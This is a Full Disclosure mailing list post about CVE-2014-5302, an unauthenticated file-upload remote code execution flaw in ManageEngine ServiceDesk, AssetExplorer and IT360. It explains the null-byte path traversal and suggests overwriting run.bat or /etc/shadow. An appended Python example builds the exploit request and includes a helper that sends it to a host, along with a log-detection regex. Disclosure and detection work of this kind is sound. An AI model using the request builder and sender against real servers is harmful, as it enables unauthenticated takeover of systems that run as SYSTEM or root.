Full Disclosure mailing list archives

Re: [The ManageOwnage Series, part XI]: Remote code execution in ServiceDesk, Asset Explorer, Support Center and IT360


From: Pedro Ribeiro <pedrib () gmail com>
Date: Tue, 6 Jan 2015 22:56:40 +0000

On 4 January 2015 at 17:19, Pedro Ribeiro <pedrib () gmail com> wrote:
> #2
> Vulnerability: Remote code execution via file upload (unauthenticated)
> CVE-2014-5302
> Constraints: no authentication or any other information needed except
> for IT360 (guest account needed); code execution is only possible by
> replacing one of the <install_dir>bin/ scripts and waiting for them to
> be executed or for a periodic task to run. This is because only text
> files can be uploaded as binary files are mangled; and there is no JSP
> compiler in the $PATH.
> Affected versions: ServiceDesk Plus / Plus MSP v7.6 to v9.0 build
> 9026; AssetExplorer v? to v6.1 build 6106; IT360 v? to v10.4
>
> POST /discoveryServlet/WsDiscoveryServlet?computerName=../bin/run.bat%00
> POST /discoveryServlet/WsDiscoveryServlet?computerName=../bin/backUpData.bat%00
> <...text file / script payload here...>


Someone has asked me how CVE-2014-5302 can be exploited.

There are 3 things you have got to keep in mind:
1 - send a null byte (%00) after the file name
2 - send the request as mime type application/octet-stream
3 - send only ASCII data in the request body

Unfortunately it's not as trivial as uploading an ASCII webshell to
the web root. Because of the way these applications are packaged, the
JSP compiler is not set automatically in the PATH/classpath. However,
if you are lucky, the JSP compiler already exists in the
PATH/classpath because of some other application.

Therefore in order to exploit this vulnerability you need to come up
with some clever way like overwriting the run.bat file, uploading a
new /etc/shadow, etc. Note that these apps always run as SYSTEM under
Windows, but they may not run as root in Linux - it depends how they
were installed.

Regards,
Pedro
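Added example (not code from Pedro's post or from ManageEngine): the request described in the reply, assembled in Python so the three constraints listed above are enforced mechanically, plus a small access-log check that flags the same traversal pattern for defenders. The host name, the replacement batch body and the log lines are constructed placeholders; the endpoint, parameter name, null byte, content type and ASCII-only rule come from the thread.

```python
"""Build the CVE-2014-5302 upload request from the thread and check
access logs for the same pattern.  Added example, not the poster's code."""
import re
import socket
from urllib.parse import quote

# Endpoint and parameter name exactly as given in the post.
ENDPOINT = "/discoveryServlet/WsDiscoveryServlet"


def build_upload_request(host, target_path, body):
    """Return the raw HTTP request bytes.

    target_path is relative to the servlet's write location, e.g.
    '../bin/run.bat' (taken from the post).  body must be ASCII because
    the server mangles binary uploads (constraint 3 in the post).
    """
    if not body.isascii():
        raise ValueError("binary bodies are mangled by the server; send ASCII only")
    # Constraint 1: a null byte (%00) directly after the file name.
    query = "computerName=" + quote(target_path, safe="/") + "%00"
    data = body.encode("ascii")
    headers = [
        f"POST {ENDPOINT}?{query} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/octet-stream",  # constraint 2
        f"Content-Length: {len(data)}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("ascii") + data


def send_raw(host, port, raw, timeout=10):
    """Send the raw request and return the response bytes (network helper,
    not exercised here; assumes plain HTTP on the given port)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Detection side: the traversal plus trailing null byte in the computerName
# parameter, in either raw or URL-encoded form.  Assumed pattern, derived
# from the request lines in the post.
TRAVERSAL_NULL = re.compile(
    r'WsDiscoveryServlet\?computerName=[^ "]*'
    r'(?:\.\./|\.\.\\|%2e%2e(?:%2f|%5c))[^ "]*%00',
    re.IGNORECASE,
)


def is_suspicious_log_line(line):
    """True when a combined-format access log line carries the pattern."""
    return bool(TRAVERSAL_NULL.search(line))


def flag_log_lines(lines):
    """Return the log lines that match the traversal + null byte pattern."""
    return [line for line in lines if is_suspicious_log_line(line)]


# Constructed sample log lines for the check above (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jan/2015:22:00:01 +0000] "POST /discoveryServlet/'
    'WsDiscoveryServlet?computerName=../bin/run.bat%00 HTTP/1.1" 200 12',
    '10.0.0.6 - - [06/Jan/2015:22:00:02 +0000] "POST /discoveryServlet/'
    'WsDiscoveryServlet?computerName=host01 HTTP/1.1" 200 12',
    '10.0.0.7 - - [06/Jan/2015:22:00:03 +0000] "POST /discoveryServlet/'
    'WsDiscoveryServlet?computerName=%2e%2e%2fbin%2fbackUpData.bat%00 HTTP/1.1" 200 12',
]


if __name__ == "__main__":
    # Constructed placeholder body; a real test would use the script the
    # target's bin/ directory expects.
    req = build_upload_request("target.example", "../bin/run.bat",
                               "@echo off\r\necho added example\r\n")
    print(req.decode("ascii"))
    for line in flag_log_lines(SAMPLE_LOG):
        print("FLAGGED:", line)
```

The builder refuses non-ASCII bodies rather than silently sending them, since the post says binaries are mangled server-side and the upload would only corrupt the target script. The log check is deliberately narrow (that servlet, that parameter, a traversal and a trailing null) so it can run over large logs without noise.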

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

